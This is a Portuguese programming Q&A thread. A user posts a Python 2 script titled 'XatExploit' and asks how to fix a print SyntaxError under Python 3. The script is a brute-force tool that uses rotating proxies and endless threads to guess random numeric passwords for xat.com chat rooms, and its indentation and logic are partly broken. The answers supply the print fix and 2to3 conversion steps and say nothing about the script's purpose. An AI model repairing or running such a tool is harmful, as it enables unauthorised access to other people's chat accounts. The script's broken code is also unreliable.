# Erro de sintaxe em arquivo .py

Tags: python

Procurei um código .py na internet e na hora de executá-lo sai a seguinte mensagem:

File "C:\Users\Valnei\Desktop\XatExploit.py", line 26
print "Trying password => " + str(String_7)

SyntaxError: invalid syntax

```
import random
import threading
from threading import Thread

#ArcticBear / ArcticFox / TheFox / EVERY OTHER NICKNAME X3 's Main Owner Exploit v2 (Chat Default Password Bruteforce)

global init, main, Room_3

def getBetween(strSource, strStart,strEnd):
    start = strSource.find(strStart) + len(strStart)
    end = strSource.find(strEnd,start)
    return strSource[start:end]

def xat(url):
    global Proxy_1, Proxy_2, Proxy_3, Proxy_4, Proxy_5
    Randomity = random.randint(1, 2)
    Password_1 = open("password.txt","a")
    Proxy_1 = [i.strip() for i in open('C:\Users\Valnei\Desktop\Proxies.txt','r').read().splitlines()]
    Proxy_2 = random.choice(Proxy_1)
    Proxy_3 = Proxy_2.split(':')
    Proxy_4 = 'http://' + str(Proxy_3[0]) + ':' + str(Proxy_3[1])
    if Randomity == 1:
      Page_1 = urllib.urlopen(url).read()
    else:
      Page_1 = urllib.urlopen(url, proxies = { 'http': Proxy_4 }).read()
      print "Trying password => " + str(String_7)
    try:
      Page_2 = getBetween(Page_1,'<font color=red><b> <span>','</span></b></font><BR>')
      if Page_2.find('not found') or Page_2.find('Error. Try again in 10 minutes.'):
           print("Failed!")
      else:
           print("Password found!")
           Password_1.write(str(Page_2))
 except:
      while 1:
           threading.Thread(target=main,args=()).start()
           time.sleep(2)
 while 1:
      threading.Thread(target=main,args=()).start()
      time.sleep(2)

 def init(Room):
     import random
     global String_7
     Strings_1, Strings_2 = ['a','b','c','d','e'], ['f','g','h','i','j']
     String_2 = ''.join(Strings_1)
     String_3 = ''.join(Strings_2)
     String_4 = len(String_2)
     String_5 = len(String_3)
     String_6 = int(String_4) ** 13
     String_7 = random.randint(String_6, 9999999999)
     #print str(String_7)
     xat('http://xat.com/web_gear/chat.php?id='+Room+'&pw='+str(String_7))
     time.sleep(1)

def main():
     init(Room_3)

import urllib
     Room_1 = 'NewOption'
     Room_2 = urllib.urlopen('http://xat.com/' + Room_1).read()
     Room_3 = getBetween(Room_2,'flashvars="id=','&')

     while 1:
         import time
         threading.Thread(target=main,args=()).start()
         time.sleep(1)
     while 1:
         threading.Thread(target=main,args=()).start()
         time.sleep(1)
```

A versão do meu python é 3.6.0. O que faço para corrigir esse erro?

Answer (score 3):

Você pode usar a biblioteca 2to3 para converter automaticamente um código em python2 para python3, assim não precisaria fazer downgrade do python.

Ela já deve vir instalada junto com seu python.
No Linux, bastaria digitar o seguinte comando, que imprime o diff necessário para transformar o código para python3:

```
2to3 source.py
```

Às vezes o comando a ser usado pode ser uma variação de 2to3, como 2to3-3.4, por exemplo.

No Windows, seria necessário um comando como esse, dependendo de onde está instalado seu python:

```
python.exe C:\Python32\Tools\scripts\2to3.py source.py
```

Para traduzir um projeto inteiro para outra pasta, bastaria fazer isso:

```
2to3 --output-dir=python3-version/mycode -W -n python2-version/mycode
```

Ou, no Windows:

```
python.exe C:\Python32\Tools\scripts\2to3.py --output-dir=python3-version/mycode -W -n python2-version/mycode
```

Para mais informações sobre o comando, ver a [documentação (em inglês)](https://docs.python.org/2/library/2to3.html#).

Comment: Sou novato e o meu +1 não aparece, mas obrigado!

Comment: De nada! Vale lembrar que mesmo depois da conversão com o 2to3, ainda podem ocorrer alguns erros, porque ela nem sempre é 100% eficaz. Mas com certeza serão poucos erros e será possível corrigir manualmente.

Comment: esse arquivo tem outros pontos problemáticos - por exemplo,o caminho para o arquivo usando "\"   e não "\\" ou "/".  @yab1997: você pode aceitar a resposta também- clicando na marquinha.

Answer (score 1):

Faltou um parenteses, fica assim:

```
print ("Trying password => " + str(String_7))
```

É um problema de compatibilidade entre o Python 2 e o Python 3, no 2.x funciona, no 3.x não.

Comment: O problema foi resolvido, mas surgiu outro erro, devo fazer downgrade de Python? No caso para qualquer versão 2.x?

Comment: Sou novato e o meu +1 não aparece, mas obrigado!